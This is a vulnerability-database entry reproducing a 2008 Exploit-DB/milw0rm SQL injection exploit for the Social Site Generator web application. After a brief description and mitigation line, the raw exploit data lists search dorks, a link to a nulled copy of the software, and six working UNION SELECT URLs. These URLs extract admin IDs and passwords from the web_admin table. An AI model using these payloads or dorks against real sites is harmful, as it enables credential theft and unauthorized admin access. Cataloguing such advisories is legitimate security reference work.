Social Site Generator SQL Injection Vulnerability

vendor:

Social Site Generator

by:

DeAr Ev!L

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Social Site Generator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Social Site Generator SQL Injection Vulnerability

A SQL Injection vulnerability was discovered in Social Site Generator, which allows an attacker to gain access to the admin credentials. The vulnerability is caused due to the improper sanitization of user-supplied input to the 'sgc_id', 'scm_mem_id' and 'catid' parameters in the 'display_blog.php', 'social_my_profile_download.php' and 'social_forum_subcategories.php' scripts. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameters. This can allow the attacker to gain access to the admin credentials.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.

Source

Exploit-DB raw data:

< -------------------\__________________/------------------- >

#
#
# Application Name        : Social Site Generator
#
# DeMo                        : www.ssgdemo.com
#
#Download                   : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type         : SQL InJeCtiOn
#
# Dork 1                       : display_blog.php
# Dork 2                       : social_my_profile_download
# Dork 3                       : social_forum_subcategories
#
# author                       : DeAr Ev!L
#
#
# Greatz                      : ALLAH
#                                : Genie & Roy5 & Mister-x
#                        
# Team                       : DeLtA MoRoCcAn tEaM
#
#Site Web                   : WwW.BHJA.NeT
#
< -------------------^_________________^------------------- >



< -- bug SQL start -- >

ADMIN :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin

Password :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,password+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+password,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,password+from+web_admin

< -- bug SQL End -- >

# milw0rm.com [2008-05-31]